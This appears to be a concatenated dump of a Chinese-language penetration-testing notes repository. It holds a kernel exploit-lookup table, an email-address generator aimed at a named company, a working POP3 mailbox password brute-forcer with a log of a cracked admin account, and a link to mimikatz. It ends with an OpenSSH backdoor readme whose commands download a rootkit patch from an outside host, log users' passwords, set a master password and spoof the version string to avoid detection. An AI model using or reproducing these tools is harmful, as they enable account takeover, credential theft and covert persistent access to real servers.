109 | '2.6.8', '2.6.10', '2.6.11', '2.6.12', 110 | '2.6.13', '2.6.14', '2.6.15', '2.6.16', 111 | ], 112 | cve => '2006-3626', 113 | mil => 'http://www.exploit-db.com/exploits/2013/', 114 | }, 115 | 116 | 'kdump' => { vuln => ['2.6.13'] }, 117 | 'km2' => { vuln => [ '2.4.18', '2.4.22' ] }, 118 | 'krad' => 119 | { vuln => [ '2.6.5', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11' ] }, 120 | 121 | 'krad3' => { 122 | vuln => [ '2.6.5', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11' ], 123 | mil => 'http://exploit-db.com/exploits/1397', 124 | }, 125 | 126 | 'local26' => { vuln => ['2.6.13'] }, 127 | 'loko' => { vuln => [ '2.4.22', '2.4.23', '2.4.24' ] }, 128 | 129 | 'mremap_pte' => { 130 | vuln => [ '2.4.20', '2.2.24', '2.4.25', '2.4.26', '2.4.27' ], 131 | mil => 'http://www.exploit-db.com/exploits/160/', 132 | }, 133 | 134 | 'newlocal' => { vuln => [ '2.4.17', '2.4.19' ] }, 135 | 'ong_bak' => { vuln => ['2.6.5'] }, 136 | 'ptrace' => 137 | { vuln => [ '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ] }, 138 | 'ptrace_kmod' => { 139 | vuln => [ '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ], 140 | cve => '2007-4573', 141 | }, 142 | 'ptrace_kmod2' => { 143 | vuln => [ 144 | '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31', 145 | '2.6.32', '2.6.33', '2.6.34', 146 | ], 147 | alt => 'ia32syscall,robert_you_suck', 148 | mil => 'http://www.exploit-db.com/exploits/15023/', 149 | cve => '2010-3301', 150 | }, 151 | 'ptrace24' => { vuln => ['2.4.9'] }, 152 | 'pwned' => { vuln => ['2.6.11'] }, 153 | 'py2' => { vuln => [ '2.6.9', '2.6.17', '2.6.15', '2.6.13' ] }, 154 | 'raptor_prctl' => { 155 | vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ], 156 | cve => '2006-2451', 157 | mil => 'http://www.exploit-db.com/exploits/2031/', 158 | }, 159 | 'prctl' => { 160 | vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ], 161 | mil => 'http://www.exploit-db.com/exploits/2004/', 162 | }, 163 | 'prctl2' => { 164 | vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ], 165 | mil => 'http://www.exploit-db.com/exploits/2005/', 166 | }, 167 | 'prctl3' => { 168 | vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ], 169 | mil => 'http://www.exploit-db.com/exploits/2006/', 170 | }, 171 | 'prctl4' => { 172 | vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ], 173 | mil => 'http://www.exploit-db.com/exploits/2011/', 174 | }, 175 | 'remap' => { vuln => ['2.4.'] }, 176 | 'rip' => { vuln => ['2.2.'] }, 177 | 'stackgrow2' => { vuln => [ '2.4.29', '2.6.10' ] }, 178 | 'uselib24' => { 179 | vuln => [ '2.6.10', '2.4.17', '2.4.22', '2.4.25', '2.4.27', '2.4.29' ] 180 | }, 181 | 'newsmp' => { vuln => ['2.6.'] }, 182 | 'smpracer' => { vuln => ['2.4.29'] }, 183 | 'loginx' => { vuln => ['2.4.22'] }, 184 | 'exp.sh' => { vuln => [ '2.6.9', '2.6.10', '2.6.16', '2.6.13' ] }, 185 | 'vmsplice1' => { 186 | vuln => [ 187 | '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', 188 | '2.6.23', '2.6.24', '2.6.24.1', 189 | ], 190 | alt => 'jessica biel', 191 | cve => '2008-0600', 192 | mil => 'http://www.exploit-db.com/exploits/5092', 193 | }, 194 | 'vmsplice2' => { 195 | vuln => [ '2.6.23', '2.6.24' ], 196 | alt => 'diane_lane', 197 | cve => '2008-0600', 198 | mil => 'http://www.exploit-db.com/exploits/5093', 199 | }, 200 | 'vconsole' => { 201 | vuln => ['2.6.'], 202 | cve => '2009-1046', 203 | }, 204 | 'sctp' => { 205 | vuln => ['2.6.26'], 206 | cve => '2008-4113', 207 | }, 208 | 'ftrex' => { 209 | vuln => [ 210 | '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', 211 | '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', 212 | ], 213 | cve => '2008-4210', 214 | mil => 'http://www.exploit-db.com/exploits/6851', 215 | }, 216 | 'exit_notify' => { 217 | vuln => [ '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29' ], 218 | mil => 'http://www.exploit-db.com/exploits/8369', 219 | }, 220 | 'udev' => { 221 | vuln => [ '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29' ], 222 | alt => 'udev <1.4.1', 223 | cve => '2009-1185', 224 | mil => 'http://www.exploit-db.com/exploits/8478', 225 | }, 226 | 227 | 'sock_sendpage2' => { 228 | vuln => [ 229 | '2.4.4', '2.4.5', '2.4.6', '2.4.7', '2.4.8', '2.4.9', 230 | '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15', 231 | '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21', 232 | '2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27', 233 | '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33', 234 | '2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.0', '2.6.1', 235 | '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7', 236 | '2.6.8', '2.6.9', '2.6.10', '2.6.11', '2.6.12', '2.6.13', 237 | '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19', 238 | '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25', 239 | '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', 240 | ], 241 | alt => 'proto_ops', 242 | cve => '2009-2692', 243 | mil => 'http://www.exploit-db.com/exploits/9436', 244 | }, 245 | 246 | 'sock_sendpage' => { 247 | vuln => [ 248 | '2.4.4', '2.4.5', '2.4.6', '2.4.7', '2.4.8', '2.4.9', 249 | '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15', 250 | '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21', 251 | '2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27', 252 | '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33', 253 | '2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.0', '2.6.1', 254 | '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7', 255 | '2.6.8', '2.6.9', '2.6.10', '2.6.11', '2.6.12', '2.6.13', 256 | '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19', 257 | '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25', 258 | '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', 259 | ], 260 | alt => 'wunderbar_emporium', 261 | cve => '2009-2692', 262 | mil => 'http://www.exploit-db.com/exploits/9435', 263 | }, 264 | 'udp_sendmsg_32bit' => { 265 | vuln => [ 266 | '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', 267 | '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', '2.6.12', 268 | '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', 269 | '2.6.19', 270 | ], 271 | cve => '2009-2698', 272 | mil => 273 | 'http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c', 274 | }, 275 | 'pipe.c_32bit' => { 276 | vuln => [ 277 | '2.4.4', '2.4.5', '2.4.6', '2.4.7', '2.4.8', '2.4.9', 278 | '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15', 279 | '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21', 280 | '2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27', 281 | '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33', 282 | '2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.15', '2.6.16', 283 | '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', 284 | '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', 285 | '2.6.29', '2.6.30', '2.6.31', 286 | ], 287 | cve => '2009-3547', 288 | mil => 289 | 'http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c', 290 | }, 291 | 'do_pages_move' => { 292 | vuln => [ 293 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', 294 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', 295 | '2.6.30', '2.6.31', 296 | ], 297 | alt => 'sieve', 298 | cve => '2010-0415', 299 | mil => 'Spenders Enlightenment', 300 | }, 301 | 'reiserfs' => { 302 | vuln => [ 303 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', 304 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', 305 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', 306 | ], 307 | cve => '2010-1146', 308 | mil => 'http://www.exploit-db.com/exploits/12130/', 309 | }, 310 | 'can_bcm' => { 311 | vuln => [ 312 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', 313 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', 314 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', 315 | '2.6.36', 316 | ], 317 | cve => '2010-2959', 318 | mil => 'http://www.exploit-db.com/exploits/14814/', 319 | }, 320 | 'rds' => { 321 | vuln => [ 322 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', 323 | '2.6.34', '2.6.35', '2.6.36', 324 | ], 325 | mil => 'http://www.exploit-db.com/exploits/15285/', 326 | cve => '2010-3904', 327 | }, 328 | 'half_nelson' => { 329 | vuln => [ 330 | '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', 331 | '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', 332 | '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', 333 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', 334 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', 335 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', 336 | '2.6.36', 337 | ], 338 | alt => 'econet', 339 | cve => '2010-3848', 340 | mil => 'http://www.exploit-db.com/exploits/6851', 341 | }, 342 | 'half_nelson1' => { 343 | vuln => [ 344 | '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', 345 | '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', 346 | '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', 347 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', 348 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', 349 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', 350 | '2.6.36', 351 | ], 352 | alt => 'econet', 353 | cve => '2010-3848', 354 | mil => 'http://www.exploit-db.com/exploits/17787/', 355 | }, 356 | 'half_nelson2' => { 357 | vuln => [ 358 | '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', 359 | '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', 360 | '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', 361 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', 362 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', 363 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', 364 | '2.6.36', 365 | ], 366 | alt => 'econet', 367 | cve => '2010-3850', 368 | mil => 'http://www.exploit-db.com/exploits/17787/', 369 | }, 370 | 'half_nelson3' => { 371 | vuln => [ 372 | '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', 373 | '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', 374 | '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', 375 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', 376 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', 377 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', 378 | '2.6.36', 379 | ], 380 | alt => 'econet', 381 | cve => '2010-4073', 382 | mil => 'http://www.exploit-db.com/exploits/17787/', 383 | }, 384 | 'caps_to_root' => { 385 | vuln => [ '2.6.34', '2.6.35', '2.6.36' ], 386 | cve => 'n/a', 387 | mil => 'http://www.exploit-db.com/exploits/15916/', 388 | }, 389 | 'american-sign-language' => { 390 | vuln => [ 391 | '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', 392 | '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', 393 | '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', 394 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', 395 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', 396 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', 397 | '2.6.36', 398 | ], 399 | cve => '2010-4347', 400 | mil => 'http://www.securityfocus.com/bid/45408/', 401 | }, 402 | 'pktcdvd' => { 403 | vuln => [ 404 | '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', 405 | '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', 406 | '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', 407 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', 408 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', 409 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', 410 | '2.6.36', 411 | ], 412 | cve => '2010-3437', 413 | mil => 'http://www.exploit-db.com/exploits/15150/', 414 | }, 415 | 'video4linux' => { 416 | vuln => [ 417 | '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', 418 | '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', 419 | '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', 420 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', 421 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', 422 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', 423 | ], 424 | cve => '2010-3081', 425 | mil => 'http://www.exploit-db.com/exploits/15024/', 426 | }, 427 | 'memodipper' => { 428 | vuln => [ 429 | '2.6.39', '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4', 430 | '3.0.5', '3.0.6', '3.1.0', 431 | ], 432 | cve => '2012-0056', 433 | mil => 'http://www.exploit-db.com/exploits/18411/', 434 | }, 435 | 'semtex' => { 436 | vuln => [ 437 | '2.6.37', '2.6.38', '2.6.39', '3.0.0', '3.0.1', '3.0.2', 438 | '3.0.3', '3.0.4', '3.0.5', '3.0.6', '3.1.0', 439 | ], 440 | cve => '2013-2094', 441 | mil => 'http://www.exploit-db.com/download/25444/‎', 442 | }, 443 | 'perf_swevent' => { 444 | vuln => [ 445 | '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4', '3.0.5', 446 | '3.0.6', '3.1.0', '3.2', '3.3', '3.4.0', '3.4.1', 447 | '3.4.2', '3.4.3', '3.4.4', '3.4.5', '3.4.6', '3.4.8', 448 | '3.4.9', '3.5', '3.6', '3.7', '3.8.0', '3.8.1', 449 | '3.8.2', '3.8.3', '3.8.4', '3.8.5', '3.8.6', '3.8.7', 450 | '3.8.8', '3.8.9', 451 | ], 452 | cve => '2013-2094', 453 | mil => 'http://www.exploit-db.com/download/26131', 454 | }, 455 | 'perf_swevent_init' => { 456 | vuln =>[ 457 | '3.2.0','3.3','3.4.0', '3.4.1', 458 | '3.4.2', '3.4.3', '3.4.4', '3.4.5', '3.4.6', '3.4.8', 459 | '3.4.9','3.5.0', 460 | ], 461 | cve => '2013-2094', 462 | mil => 'https://www.exploit-db.com/exploits/33589/', 463 | }, 464 | 'msr' => { 465 | vuln => [ 466 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', 467 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.27', '2.6.28', 468 | '2.6.29', '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', 469 | '2.6.35', '2.6.36', '2.6.37', '2.6.38', '2.6.39', '3.0.0', 470 | '3.0.1', '3.0.2', '3.0.3', '3.0.4', '3.0.5', '3.0.6', 471 | '3.1.0', '3.2', '3.3', '3.4', '3.5', '3.6', 472 | '3.7.0', '3.7.6', 473 | ], 474 | cve => '2013-0268', 475 | mil => 'http://www.exploit-db.com/exploits/27297/', 476 | }, 477 | 'timeoutpwn' => { 478 | vuln => [ 479 | '3.4', '3.5', '3.6', '3.7', '3.8', '3.8.9', '3.9', '3.10', 480 | '3.11', '3.12', '3.13', '3.4.0', '3.5.0', '3.6.0', '3.7.0', 481 | '3.8.0','3.8.5', '3.8.6', '3.8.9', '3.9.0', '3.9.6', 482 | '3.10.0','3.10.6', '3.11.0','3.12.0','3.13.0','3.13.1' 483 | ], 484 | cve => '2014-0038', 485 | mil => 'http://www.exploit-db.com/exploits/31346/', 486 | }, 487 | 'rawmodePTY' => { 488 | vuln => [ 489 | '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', '2.6.36', '2.6.37', 490 | '2.6.38', '2.6.39', '3.14', '3.15' 491 | ], 492 | cve => '2014-0196', 493 | mil => 'http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c', 494 | }, 495 | 'netfilter' => { 496 | vuln => [ 497 | '4.4.0', 498 | ], 499 | cve => 'N/A', 500 | mil => 'https://www.exploit-db.com/exploits/40049/', 501 | }, 502 | 'REFCOUNT' => { 503 | vuln => ['4.4.1'], 504 | cve => '2016-0728', 505 | mil => 'https://www.exploit-db.com/exploits/40003/', 506 | }, 507 | 'overlayfs' => { 508 | vuln => [ 509 | '3.13.0','3.13.1','3.13.2','3.13.3','3.13.4','3.13.5','3.13.6', 510 | '3.13.7','3.13.8','3.13.9','3.13.10','3.13.11', 511 | '3.14.0','3.14.68','3.14.5','3.14.71','3.14.74','3.14.75', 512 | '3.15.0','3.16.0','3.16.36', 513 | '3.17.0','3.18.0','3.18.38','3.18.39', 514 | '3.19.0', 515 | ], 516 | cve => '2015-1328', 517 | mil => 'https://www.exploit-db.com/exploits/37292/', 518 | }, 519 | 'libfutex' => { 520 | vuln => [ 521 | '3.14.5', 522 | ], 523 | cve => '2014-3153', 524 | mil => 'https://www.exploit-db.com/exploits/35370/', 525 | }, 526 | 'RemountFUSE' => { 527 | vuln => ['3.16.0'], 528 | cve => '2014-5207', 529 | mil => 'https://www.exploit-db.com/exploits/34923/', 530 | }, 531 | 'bpf' => { 532 | vuln => ['4.4'], 533 | cve => '2016-4557', 534 | mil => 'https://www.exploit-db.com/exploits/39772/', 535 | }, 536 | ); 537 | } 538 | 539 | __END__ 540 | =head1 NAME 541 | 542 | Linux_Exploit_Suggester.pl - A local exploit suggester for linux 543 | 544 | =head1 DESCRIPTION 545 | 546 | This perl script will enumerate the possible exploits available for a given kernel version 547 | 548 | =head1 USAGE 549 | $ Local_Exploit_Checker [-h] [-k kernel] 550 | 551 | [-h] help 552 | [-k] kernel Eg. 2.6.28 553 | 554 | You can also provide a partial kernel version (eg. 2.4) 555 | to see all exploits available. 556 | 557 | =head1 AUTHOR 558 | 559 | Andy (c) 10-07-2009 560 | 561 | Thanks to Brian for bugfixes, and sploit additions. 562 | 563 | =head1 CHANGELOG 564 | 19-04-2014 added cve-2014-0196 and bug fixes (Andy) 565 | 566 | 05-09-2013 code cleanup/optimizations and partial kernel feature (garu) 567 | 568 | 28-08-2013 added msr driver (Andy) 569 | 570 | 12-06-2013 added perf_swevent (Andy) 571 | 572 | 23-01-2012 added memodipper (Andy) 573 | 574 | 14-11-2011 bug fix to cut kernel version, plus a few more sploits listed (Brian) 575 | 576 | =cut 577 | 578 | =head1 LICENSE 579 | 580 | Linux Exploit Suggester 581 | 582 | This program is free software; you can redistribute it and/or modify 583 | it under the terms of the GNU General Public License as published by 584 | the Free Software Foundation; either version 2 of the License, or 585 | (at your option) any later version. 586 | 587 | This program is distributed in the hope that it will be useful, 588 | but WITHOUT ANY WARRANTY; without even the implied warranty of 589 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 590 | GNU General Public License for more details. 591 | 592 | You should have received a copy of the GNU General Public License along 593 | with this program; if not, write to the Free Software Foundation, Inc., 594 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. 595 | 596 | 597 | =cut 598 | 599 | 600 | 601 | 602 | 603 | // 604 | kali 自带的有一个比他全的东西 searchsploit 然后输入 关键字就好了 605 | -------------------------------------------------------------------------------- /mail.py: -------------------------------------------------------------------------------- 1 | a = open('mail.txt','w') 2 | x = open('xingming500.txt','r') 3 | for f in x: 4 | f = f.strip() 5 | print f + '@chinabaiker.com' 6 | print>>a,f + '@chinabaiker.com' 7 | 8 | 9 | 10 | zhangnan@chinabaiker.com 11 | liuguizhen@chinabaiker.com 12 | liuyu@chinabaiker.com 13 | liujianjun@chinabaiker.com 14 | zhangshuying@chinabaiker.com 15 | lihongxia@chinabaiker.com 16 | zhaoxiuying@chinabaiker.com 17 | libo@chinabaiker.com 18 | wangli@chinabaiker.com 19 | zhangrong@chinabaiker.com 20 | -------------------------------------------------------------------------------- /mailbrute.py: -------------------------------------------------------------------------------- 1 | 脚本亮点:password字典支持:{username}123 这种形式。可以自定义如果用户名是test则密码为test123 2 | 成功的帐号密码实时显示,不必等到结束后才能看到,而且会把结果保存在同目录的mailsuccess.txt中。 3 | 在渗透一些大企业的员工邮箱中可以用到。 4 | 用法:mailbrute.py <@example.com> 5 | mailbrute.py user.txt pass.txt 110 pop.qq.com @xxx.com 6 | --user.txt 用户名字典 7 | --pass.txt 密码字典 8 | --110 端口(这里可以是110或者995) 9 | --pop.qq.com 邮件server 10 | --@xxx.com 邮箱后缀 11 | 12 | 13 | 14 | import poplib 15 | import sys 16 | import time 17 | 18 | if len(sys.argv) !=6: 19 | print "\tUsage: %s <@chinabaiker.com> \n" %sys.argv[0] 20 | sys.exit(1) 21 | success1 = open('mailsuccess1.txt','w') 22 | user = sys.argv[1] 23 | words = sys.argv[2] 24 | port = sys.argv[3] 25 | server = sys.argv[4] 26 | name = sys.argv[5] 27 | 28 | userlist = open(user,'r').read().split("\n") 29 | wordslist = open(words,'r').read().split("\n") 30 | success = [] 31 | 32 | for mail_user in userlist: 33 | agent_user = mail_user 34 | mail_user = agent_user + name 35 | for mail_pass in wordslist: 36 | if "{username}" in mail_pass: 37 | mail_pass = mail_pass.replace("{username}",agent_user) 38 | try: 39 | print "+"*12 40 | print "[*]"+mail_user +":" +mail_pass 41 | if int(port)==110: 42 | popserver = poplib.POP3(server,110) 43 | else: 44 | popserver = poplib.POP3_SSL(server,995) 45 | popserver.user(mail_user) 46 | auth = popserver.pass_(mail_pass) 47 | if auth.split(' ')[0] == "+OK" or auth =="+OK": 48 | res = (mail_user,mail_pass,popserver.stat()[0],popserver.stat()[1]) 49 | success.append(res) 50 | print success 51 | print>>success1,success 52 | popserver.quit() 53 | break 54 | else : 55 | popserver.quit() 56 | continue 57 | except: 58 | pass 59 | time.sleep(1) 60 | 61 | 62 | print "\n+++++++++++++++++++++++++++++++++++++" 63 | print "+++++++++++++++++++++++++++++++++++++" 64 | 65 | if len(success)==0: 66 | print "[-]-_-|| no weakpass " 67 | if len(success) >=1: 68 | print "[+] have weakpass :" 69 | for res in success: 70 | print "\n[+] Login successful:",res[0], res[1] 71 | print "\t[+] Mail:",res[2],"emails" 72 | print "\t[+] Size:",res[3],"bytes\n" 73 | print "\n[-] Done" 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | root@kali:~/Desktop# python mail2.py mail.txt mailpass.txt 110 pop.exmail.qq.com @chinabaiker.com 84 | ++++++++++++ 85 | [*]aaaa@chinabaiker.com:aaaaa 86 | ++++++++++++ 87 | [*]aaaa@chinabaiker.com:ccccc 88 | ++++++++++++ 89 | [*]aaaa@chinabaiker.com:admin 90 | ++++++++++++ 91 | [*]aaaa@chinabaiker.com:ddddd 92 | ++++++++++++ 93 | [*]ssss@chinabaiker.com:aaaaa 94 | ++++++++++++ 95 | [*]ssss@chinabaiker.com:ccccc 96 | ++++++++++++ 97 | [*]ssss@chinabaiker.com:admin 98 | ++++++++++++ 99 | [*]ssss@chinabaiker.com:ddddd 100 | ++++++++++++ 101 | [*]admin@chinabaiker.com:aaaaa 102 | ++++++++++++ 103 | [*]admin@chinabaiker.com:ccccc 104 | ++++++++++++ 105 | [*]admin@chinabaiker.com:admin 106 | [('admin@chinabaiker.com', 'admin', 166, 10353771)] 107 | ++++++++++++ 108 | [*]ddddd@chinabaiker.com:aaaaa 109 | ++++++++++++ 110 | [*]ddddd@chinabaiker.com:ccccc 111 | ++++++++++++ 112 | [*]ddddd@chinabaiker.com:admin 113 | ++++++++++++ 114 | [*]ddddd@chinabaiker.com:ddddd 115 | 116 | +++++++++++++++++++++++++++++++++++++ 117 | +++++++++++++++++++++++++++++++++++++ 118 | [+] have weakpass : 119 | 120 | [+] Login successful: admin@chinabaiker.com admin 121 | [+] Mail: 166 emails 122 | [+] Size: 10353771 bytes 123 | 124 | 125 | [-] Done 126 | -------------------------------------------------------------------------------- /md5.py: -------------------------------------------------------------------------------- 1 | import hashlib 2 | y = open('md5test.txt','w') 3 | md5 = hashlib.md5() 4 | a = range(1434958800,1434959220) 5 | for x in a: 6 | f = "xsser_TPdqsI_4_" + str(x) 7 | b = md5.update(str(f)) 8 | c = md5.hexdigest() 9 | print c 10 | print>>y,c 11 | -------------------------------------------------------------------------------- /mimikatz_trunk.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Jumbo-WJB/notes/32f890b60763f67b532c4db7e7cb8459c7e26721/mimikatz_trunk.zip -------------------------------------------------------------------------------- /mp3.py: -------------------------------------------------------------------------------- 1 | import mp3play 2 | filename = r'C:\Users\administrator\Desktop\y.mp3' 3 | mp3 = mp3play.load(filename) 4 | mp3.play() 5 | import time 6 | time.sleep(min(30, mp3.seconds())) 7 | mp3.stop() 8 | -------------------------------------------------------------------------------- /openssh_backdoor_readme: -------------------------------------------------------------------------------- 1 | 此SSH后门目前网上支持版本为5.9以下,因此如果显示信息中的版本为5.9以下才能使用。对高于5.9版本未做测试,理论上是可行的。此SSH后门可以强制修改目标服务器所有用户的SSH连接密码,同时对方无法重新修改SSH连接密码,而本地连接的用户密码不变。 2 | 具体步骤如下: 3 | 1、获取SSH版本信息并记录 4 | ssh -V 5 | #OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013p1, OpenSSL 1.0.1e-fips 11 Feb 2013 6 | 7 | 2、下载OpenSSH客户端以及后门程序 8 | wget http://down1.chinaunix.net/distfiles/openssh-5.9p1.tar.gz 9 | wget http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz 10 | #openssh-5.9p1.tar.gz(正规文件) 11 | #openssh-5.9p1.path.tar.gz(后门文件) 12 | 13 | 3、SSH配置文件备份 14 | mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old 15 | mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old 16 | 17 | 4、安装必备软件 18 | yum install -y openssl openssl-devel pam-devel zlib zlib-devel 19 | 20 | 5、解压并patch 21 | tar zxf openssh-5.9p1.tar.gz 22 | tar zxf openssh-5.9p1.tar.gz 23 | cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1 24 | cd openssh-5.9p1 25 | patch < sshbd5.9p1.diff 26 | 27 | 6、修改文件includes.h 文件记录用户名和密码的文件位置及其密码 28 | #define ILOG "/tmp/ilog" //记录登录到本机的用户名和密码 29 | #define OLOG "/tmp/olog" //记录本机登录到远程的用户名和密码 30 | #define SECRETPW "password" //自行设置后门密码 31 | 32 | 7、修改version.h文件使其修改后的版本信息为原始版本 33 | #define SSH_VERSION "填入之前记下来的版本号,伪装原版本" 34 | #define SSH_PORTABLE "小版本号" 35 | 36 | 8、安装并编译 37 | ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5 38 | make clean 39 | make && make install 40 | service sshd restart 41 | 42 | 